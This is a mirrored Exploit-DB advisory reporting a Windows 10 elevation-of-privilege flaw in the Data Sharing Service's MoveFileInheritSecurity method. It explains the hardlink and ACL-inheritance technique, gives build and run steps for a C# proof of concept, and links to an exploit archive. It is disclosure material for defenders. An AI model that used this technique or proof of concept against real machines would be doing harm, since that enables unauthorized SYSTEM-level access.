bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/46160.txt
Offensive Security d63de06c7a DB: 2022-11-10 
2776 changes to exploits/shellcodes/ghdb
2022-11-10 16:39:50 +00:00

36 lines
No EOL
2.2 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

Windows: DSSVC MoveFileInheritSecurity Multiple Issues EoP
Platform: Windows 10 1803 and 1809.
Class: Elevation of Privilege
Security Boundary (per Windows Security Service Criteria): User boundary
NOTE: This is one of multiple issues Im reporting in the same service. While Ive tried to ensure all the bugs are effectively orthogonal from each other its possible that fixes for one thing might affect others. Ive also not reported every possible problem with the service as at some point I had to stop. Ive not determined if any of these issues could be abusable from a sandbox, most of the issues almost certainly cant be due to the requirements for arbitrary file symlinks but its not impossible.
Summary:
The Data Sharing Service MoveFileInheritSecurity method is broken leading to EoP.
Description:
The PolicyChecker::MoveFileInheritSecurity method is almost an exact copy of the code from the Storage Service which I exploited in MSRC cases 42121 and 42122. In fact Id say its the same code copy and pasted. It has the exactly same bugs as the storage service version, specifically arbitrary file writes, due to the reverting call to MoveFileEx and arbitrary ACL setting by placing a hardlinked file in a directory with inheritable ACEs.
This method is called from DSSMoveToSharedFile and DSSMoveFromSharedFile. While those methods do some checking its still possible to bypass the checks. This results in the MoveFileInheritSecurity method being called as the SYSTEM user which results in EoP.
Im saddened by the fact this wasnt discovered during variant analysis from the Storage Service issues.
Proof of Concept:
Ive provided a PoC as a C# project. It calls DSMoveFromSharedFile to modify the DACL of a hardlink arbitrary file granted write access to the user.
1) Compile the C# project. Itll need to pull NtApiDotNet from NuGet to build.
2) Execute the PoC passing the path to a file the user cant write on the command line (but can be written by SYSTEM).
Expected Result:
The call to move the file.
Observed Result:
The call to move file succeeds and the arbitrary file is now ACLS with the Everyone group for full access.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46160.zip
Reference in a new issue View git blame Copy permalink